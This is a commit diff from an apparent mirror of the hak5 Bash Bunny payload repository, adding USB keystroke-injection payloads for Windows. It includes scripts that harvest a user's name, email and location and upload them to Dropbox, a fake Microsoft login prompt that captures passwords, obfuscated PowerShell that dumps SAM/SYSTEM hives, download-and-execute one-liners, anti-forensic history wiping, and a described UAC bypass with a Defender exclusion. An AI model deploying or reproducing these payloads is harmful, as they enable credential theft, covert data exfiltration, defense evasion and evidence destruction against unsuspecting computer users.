hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/533/head
drapl0n 2022-06-15 19:09:29 +05:30 committed by GitHub
parent c00d27240b a8db5fd948
commit 37864eeff0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
73 changed files with 5484 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
languages/es-la.json
View File

@ -144,7 +144,7 @@
"/":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
")":"02,00,27",
"=":"02,00,27",
"?":"02,00,2d",
"¡":"02,00,2e",
"¨":"02,00,2f",

154
payloads/library/Incident_Response/-BB-ET-Phone-Home/ET-Phone-Home.ps1 Normal file
View File

@ -0,0 +1,154 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
.DESCRIPTION
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
This script will get the Name and email associated with the targets microsoft account
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
#>
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
# Your dropbox access token to exfiltrate information to
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
#------------------------------------------------------------------------------------------------------------------------------------
echo $FN >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
# Upload output file to dropbox
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

117
payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md Normal file
View File

@ -0,0 +1,117 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
## Description
This program is meant to locate your devices. When someone plugs it into their computer
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 7,10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Your device is plugged into the targets computer
* A one liner command in the run box will execute the script on the bash bunny
Something Like What you see below will be in your loot folder:
NAME
EMAIL
LATITUDE AND LONGITUDE
```
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Kalani
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/Incident_Response/-BB-ET-Phone-Home/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: ET-Phone-Home
# Description: this script will download and execute your locator script to find your device when it is plugged in
# Author: I am Jakoby
# Version: 1.0
# Category: Incident_Response
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
QUACK ENTER

178
payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 Normal file
View File

@ -0,0 +1,178 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
.DESCRIPTION
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your Bash Bunny
#>
#------------------------------------------------------------------------------------------------------------------------------------
# Creating loot folder
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to generate the ui.prompt you will use to harvest their credentials
#>
function Get-Creds {
do{
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
Get-Creds
}
$creds = $cred.GetNetworkCredential() | fl
return $creds
# ...
$done = $true
} until ($done)
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
#>
function Caps-Off {
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
#>
Pause-Script
Caps-Off
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
$creds = Get-Creds
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to save the gathered credentials to a file in the temp directory
#>
echo $creds >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This exfiltrates your loot to the Bash Bunny
#>
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

102
payloads/library/credentials/-BB-Credz-Plz/README.md Normal file
View File

@ -0,0 +1,102 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Credz-Plz
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
## Description
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your dropbox for collection
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/credentials/-BB-Credz-Plz/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Credz-Plz
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
# Author: I am Jakoby
# Version: 1.0
# Category: Recon
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
QUACK ENTER

BIN
payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 73 KiB

BIN
payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 39 KiB

21
payloads/library/credentials/SamDumpBunny/README.md Normal file
View File

@ -0,0 +1,21 @@
**Title: SamDumpBunny**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is SamDumpBunny?**
#
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**Instruction:**
1. Plug in your Bashbunny and wait a few seconds
2. Unzip the exfiltrated zip file onto your machine.
3. Use a tool like samdump2 on your machine to extract the users hashes.
> `samdump2 BunnySys BunnySam`
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

53
payloads/library/credentials/SamDumpBunny/payload.txt Normal file
View File

@ -0,0 +1,53 @@
#!/bin/bash
#
# Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
Q DELAY 250
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
Q DELAY 250
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
Q DELAY 250
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
Q DELAY 250
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
Q DELAY 250
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
Q DELAY 250
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH

89
payloads/library/execution/-BB-Play-WAV/Play-WAV.ps1 Normal file
View File

@ -0,0 +1,89 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script requires you to have a DropBox account or another file hosting service
.DESCRIPTION
This program downloads a sound from your DropBox
Turns the volume to max level on victims PC
Pauses the script until a mouse movement is detected
Then plays the sound with nothing popping up catching your victim off guard
Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
#>
############################################################################################################################################################
# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
iwr https:// <Your DropBox shared link intended for file> ?dl=1 -O $env:TMP\e.wav
############################################################################################################################################################
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
############################################################################################################################################################
# This while loop will constantly check if the mouse has been moved
# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
# it will then sleep for the indicated number of seconds and check again
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
############################################################################################################################################################
# Play Sound
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

99
payloads/library/execution/-BB-Play-WAV/README.md Normal file
View File

@ -0,0 +1,99 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Play-WAV
A script used to download a WAV file and play it after a mouse movement is detected
## Description
This program starts off by using an Invoke-WebRequest to download a WAV file
The system volume is then turned up to the max level
Then the script will be paused until a mouse movement is detected
After one is the WAV file will be played
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
```
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Play-WAV)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

26
payloads/library/execution/-BB-Play-WAV/payload.txt Normal file
View File

@ -0,0 +1,26 @@
# Title: Play-WAV
# Description: This payload will download a WAV file, pause until a mouse movement is detected then play the sound effect
# Author: I am Jakoby
# Version: 1.0
# Category: Execution
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Play-WAV.ps1')"
QUACK ENTER

97
payloads/library/execution/-BB-SafeHaven/README.md Normal file
View File

@ -0,0 +1,97 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Safe Haven
A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
## Description
This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-SafeHaven)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

23
payloads/library/execution/-BB-SafeHaven/SafeHaven.txt Normal file
View File

@ -0,0 +1,23 @@
REM Title: Safe-Haven
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console
REM Next a Directory called "safe" will be generated in your Documents Directory
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
REM Target: Windows 10, 11
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
